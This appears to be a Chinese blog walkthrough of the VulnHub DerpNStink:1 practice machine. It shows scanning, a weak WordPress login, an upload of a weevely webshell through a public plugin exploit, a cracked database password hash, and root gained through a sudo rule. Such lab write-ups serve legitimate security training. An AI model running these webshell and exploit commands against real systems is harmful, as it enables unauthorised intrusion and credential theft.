vulnhub-wp DerpNStink:1

这篇具有很好参考价值的文章主要介绍了vulnhub-wp DerpNStink:1。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

🖳 主机发现

sudo netdiscover -r 192.168.1.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts                                     
                                                                                                   
 16 Captured ARP Req/Rep packets, from 6 hosts.   Total size: 960                                  
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------                           
 192.168.1.5     20:1e:88:ad:fc:55      1      60  Intel Corporate                                 
 192.168.1.7     08:00:27:38:ee:93      1      60  PCS Systemtechnik GmbH                                   
 192.168.1.3     a2:86:90:e6:04:98      2     120  Unknown vendor                            

目标是192.168.1.7

👁 服务扫描

# Nmap 7.94SVN scan initiated Mon Feb 19 16:02:25 2024 as: nmap -p- -oN nmap_scan -sV -sC --min-rate 5000 192.168.1.7
Nmap scan report for 192.168.1.7 (192.168.1.7)
Host is up (0.00040s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
|   2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
|   256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_  256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
| http-robots.txt: 2 disallowed entries 
|_/php/ /temporary/
MAC Address: 08:00:27:38:EE:93 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb 19 16:02:34 2024 -- 1 IP address (1 host up) scanned in 8.81 seconds

第一个flag藏在主页的源代码里.然后用dirb工具爆破目录,发现了一个weblog目录

dirb http://192.168.1.7

访问之后发现是一个wordpress博客。通过尝试可以知道能通过弱口令admin:admin登录上后台,但是貌似admin并不是管理员用户,但是我们可以发现一个slideshow插件,在exploitdb可以搜索到漏洞。
exploit:https://www.exploit-db.com/exploits/34681

🚪🚶 获取权限

先用weevely生成一个后门

weevely generate admin back.php
  • admin 指定后门密码
    然后用利用漏洞代码上传后门(其实直接上传也可以)
python2 34681.py -t 192.168.1.7/weblog -f back.php -u admin -p admin

然后用weevely连接

weevely http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/backdoor.php admin

然后得到了一个简易的shell,我们也可以再用bash反弹一个shell回去。
然后用linpeas.sh进行自动枚举,发现了一些数据库的密码,在192.168.1.7/php的目录下是有一个phpmyadmin(可通过dirb扫描出来)的,我们用找到的用户名和密码登录

登录上之后,在mysql.user表里面找到了unclestinky的用户名和密码

unclestinky:*9B776AFB479B31E8047026F1185E952DD1E530CB

该密码可在网站crackstation 处破解,得到凭证unclestinky:wedgie57
然后在wordpress.wp-users表里面找到unclestinky的用户名和密码

unclestinky:$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41

🛡️ 提升权限

考虑到密码的复用性,我们可以用这个密码去登录stinky用户,使用sh切换到stinky用户,然后输入密码,成功登录。
在stinky的目录下找到一个文件,里面有一些提示,在给用户mrderp修复的时候,抓了流量包,找到这个流量包也许我们可以从中找到mrderp的密码

用wireshark打开后追踪tcp流,在第37个tcp流的时候,找到了关键信息。也可以直接筛选http,因为有提示过和修改wordpress的密码有关。

我们得到了用户mrderp的口令derpderpderpderpderpderpderp。得到口令后拿去ssh尝试登录,登录成功。

根据提示我们检查一下sudo,发现我们可以执行一个特定目录下的任意derpy开头的命令,那这样我们直接把bash文件复制一个到这个目录下。由于这个目录不存在,我们需要创建一下。

最终拿下root权限。

📖 推荐文章

DerpNStink靶机下载地址文章来源地址https://www.toymoban.com/news/detail-837670.html

到了这里,关于vulnhub-wp DerpNStink:1的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包赞助服务器费用

相关文章

  • vulnhub-wp-funbox1

    vulnhub-wp-funbox1

    本文结构 🔍 信息收集(Enumeration) 🖳 主机发现(Host Discover) 👁 端口扫描(Port Scan) 🕵️ 服务探测(Service Detection) 🚪🚶 获取权限(Foothold) 💲 ssh获取shell(ssh get shell) 🏃 rbash逃逸(rbash escape) 🛡️ 权限提升(Privilege Escalation) 🐇 兔子洞(rabbit hole) 📖 推荐文章 我们使用netdiscover命令

    2024年02月08日
    浏览(25)
  • 渗透项目(七):DERPNSTINK: 1

    渗透项目(七):DERPNSTINK: 1

    nmap收集信息 curl深入枚举 Hosts 页面信息枚举 Wpscan枚举wordpress(或用AWVS扫描) MSF 利用Slideshow Gallery模块 信息枚举 Mysql信息枚举 John暴力破解 FTP信息枚举 1、CVE-2021-4034 1)将靶机下载解压导入,打开kali利用nmap查看同局域网下的主机: nmap 192.168.44.1/24 -sP        #查看44网段下存

    2024年02月09日
    浏览(4)
  • 【Vulnhub】搭建Vulnhub靶机

    【Vulnhub】搭建Vulnhub靶机

    Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 去vulnhub的官网 https://www.vulnhub.com可以看到各种镜像。 点击某一个进入我们可以看到关于镜像的详细信息,包括:镜像描述、难度等级、下载地址等。 通过下载地址下载完成

    2024年02月05日
    浏览(10)
  • vulnhub靶场实战系列(一)之vulnhub靶场介绍

    vulnhub靶场实战系列(一)之vulnhub靶场介绍

    Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。 我们在学

    2024年02月10日
    浏览(10)
  • [wp]“古剑山”第一届全国大学生网络攻防大赛 Web部分wp

    [wp]“古剑山”第一届全国大学生网络攻防大赛 Web部分wp

    群友说是原题杯 哈哈哈哈 我也不懂 我比赛打的少  Web | unse 源码: 先伪协议读取test.php 然后得到反序列化源码: a中的$this-a触发bgood中的__toString方法,将$this-a赋值为new bfun()。 bdun中的$items[‘dd’]触发cfun中的__get函数,给$items[‘dd’]赋值为new cfun()。 最后让cdun中的$params[‘

    2024年02月04日
    浏览(15)
  • 校内赛WP

    校内赛WP

    Web题目镜像如下: 通过location跳转了,所以你看不到第一个进入的页面,通过Burpsuite拦截或者直接F12进行包记录都可以看到flag 题目源码: 一道简单的sql注入题,没有任何过滤,注入方式也是多种多样,登录处还有弱口令,以下提供多种解。 登录框,可以直接使用admin admin弱

    2024年02月03日
    浏览(5)
  • NISACTF2023 WP

    NISACTF2023 WP

    2年多没玩CTF了,pwn显得手生了不少,我的PWN环境已经在硬盘的某个角落里吃灰了。今天参加了一场校赛,捣鼓了一下午,Reverse和PWN都AK了。其实比赛是新手向,没啥难度,不过有道PWN设计的比较巧妙,got了两个tips,也就是今天将要分享的。 64位程序,只开启了栈不可执行保

    2023年04月17日
    浏览(29)
  • OtterCTF—内存取证wp

    OtterCTF—内存取证wp

    目录 前言 一、工具说明 二、题目解析 1.What the password? 2.General Info 3.Play Time 4.Name Game 5.Name Game 2 6.Silly Rick 7.Hide And Seek 8.Path To Glory 9.Path To Glory 2 10.Bit 4 Bit 11.Graphic\\\'s For The Weak 12.Recovery 13.Closure 总结 前几天有幸参加了本市的选拔赛,其中有内存取证的题,当时就愣住了,考完后

    2024年02月08日
    浏览(9)
  • ACTF 2023 部分WP

    ACTF 2023 部分WP

    来自密码手的哀嚎: 玩不了一点,太难了。 Description Malin’s Diffile-Hellman Key Exchange. task.sage output.txt 分析一下: shared = (sk_alice[0].T * pk_bob * sk_alice[1]).trace() 也就是说 shared = ((a 1 ) T  * b 1 * (b 2 ) T * a 2 ).trace() 已知 Pk_alice = a 1 * (a 2 ) T 和 Pk_bob = b 1 * (b 2 ) T 线性代数学的好的

    2024年02月06日
    浏览(11)
  • 羊城杯2023 部分wp

    羊城杯2023 部分wp

    目录 D0n\\\'t pl4y g4m3!!!(php7.4.21源码泄露pop链构造) Serpent(pickle反序列化python提权) ArkNights(环境变量泄露) Ez_misc(win10sinpping_tools恢复) 访问/p0p.php 跳转到了游戏界面 应该是存在302跳转 burp抓包 提示 /hint.zip 下载下来得到一段密文: Ö 0 0vO Ow0 0w0 Ö 0 Ö O Ö.O o_o 0.O OvO o.0 owo o.Ö Ö.Ö Ovo

    2024年02月09日
    浏览(8)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包